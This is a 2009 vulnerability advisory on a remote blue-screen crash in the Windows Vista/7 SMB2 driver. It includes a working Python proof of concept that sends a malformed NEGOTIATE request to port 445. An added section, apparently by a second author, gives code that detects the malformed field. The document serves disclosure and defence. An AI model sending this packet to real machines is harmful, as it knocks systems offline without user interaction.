=============================================
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-------------------------
Windows Vista and newer versions of Windows ship with a new SMB version named SMB2.
See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-------------------------
SRV2.SYS fails to handle malformed SMB headers in the NEGOTIATE PROTOCOL REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB server, and it is used
to identify the SMB dialect that will be used for further communication.

IV. PROOF OF CONCEPT
-------------------------

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-------------------------
An attacker can remotely crash, without any user interaction, any Vista/Windows 7 machine with SMB enabled.
Windows XP and 2000 are NOT affected as they do not have this driver.

VI. SYSTEMS AFFECTED
-------------------------
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Windows Server 2008,
as it uses the same SMB2.0 driver (not tested).
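
Detection logic for the malformed request described in sections III and IV, added here as an example that is not part of the original advisory: it parses the NetBIOS session message and the standard 32-byte SMB1 header, then flags a NEGOTIATE PROTOCOL REQUEST whose Process ID High field is nonzero (the PoC sets it to 0x2600, the "&" byte). The function names are mine, and the sample requests are constructed from the PoC's field layout purely as test input for the detector.

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# 32-byte SMB1 header, little-endian: magic, command, status, flags, flags2, PidHigh, signature, reserved, TID, PidLow, UID, MID
HEADER_FMT = "<4sBIBHH8sHHHHH"

def parse_smb1_negotiate(pkt: bytes) -> dict:
    """Parse a NetBIOS session message carrying an SMB1 request header and body."""
    if len(pkt) < 39 or pkt[0] != 0x00:
        raise ValueError("not a NetBIOS session message with room for an SMB header")
    if int.from_bytes(pkt[1:4], "big") != len(pkt) - 4:
        raise ValueError("NetBIOS length field does not match payload length")
    fields = struct.unpack(HEADER_FMT, pkt[4:36])
    if fields[0] != SMB_MAGIC:
        raise ValueError("missing \\xffSMB signature")
    word_count = pkt[36]
    bcc_off = 37 + 2 * word_count          # ByteCount follows the parameter words
    if len(pkt) < bcc_off + 2:
        raise ValueError("truncated before ByteCount")
    byte_count = struct.unpack("<H", pkt[bcc_off:bcc_off + 2])[0]
    body = pkt[bcc_off + 2:]
    if len(body) != byte_count:
        raise ValueError("ByteCount %d does not match body length %d" % (byte_count, len(body)))
    # NEGOTIATE body is a list of 0x02-prefixed, NUL-terminated dialect strings
    dialects = [d[1:].decode("ascii", "replace") for d in body.split(b"\x00") if d[:1] == b"\x02"]
    return {"command": fields[1], "flags2": fields[4], "pid_high": fields[5],
            "tid": fields[8], "pid_low": fields[9], "dialects": dialects}

def negotiate_findings(pkt: bytes) -> list:
    """Return anomaly descriptions for a NEGOTIATE request (empty list = nothing odd)."""
    f = parse_smb1_negotiate(pkt)
    findings = []
    if f["command"] != SMB_COM_NEGOTIATE:
        return findings
    if f["pid_high"] != 0:
        findings.append("nonzero PidHigh 0x%04x in NEGOTIATE (expected 0x0000)" % f["pid_high"])
        if "SMB 2.002" in f["dialects"]:
            findings.append("SMB 2.002 dialect offered: request is routed to the SMB2 driver")
    return findings

def sample_negotiate(pid_high: int) -> bytes:
    """Constructed test input with the field layout of the advisory's PoC request."""
    dialects = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"NT LM 0.12", b"SMB 2.002"]
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    hdr = struct.pack(HEADER_FMT, SMB_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                      pid_high, b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    smb = hdr + b"\x00" + struct.pack("<H", len(body)) + body   # WordCount=0, ByteCount, body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb          # NetBIOS session message
```

A NEGOTIATE with Process ID High set to 0x0000 yields no findings, while the PoC's 0x2600 yields two; the length checks make the parser refuse truncated or inconsistent packets instead of mis-reading them.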

VII. SOLUTION
-------------------------
Vendor contacted, but no patch is available for the moment.
Disable the SMB feature and block its ports until a patch is provided.

VIII. REFERENCES
-------------------------
http://microsoft.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.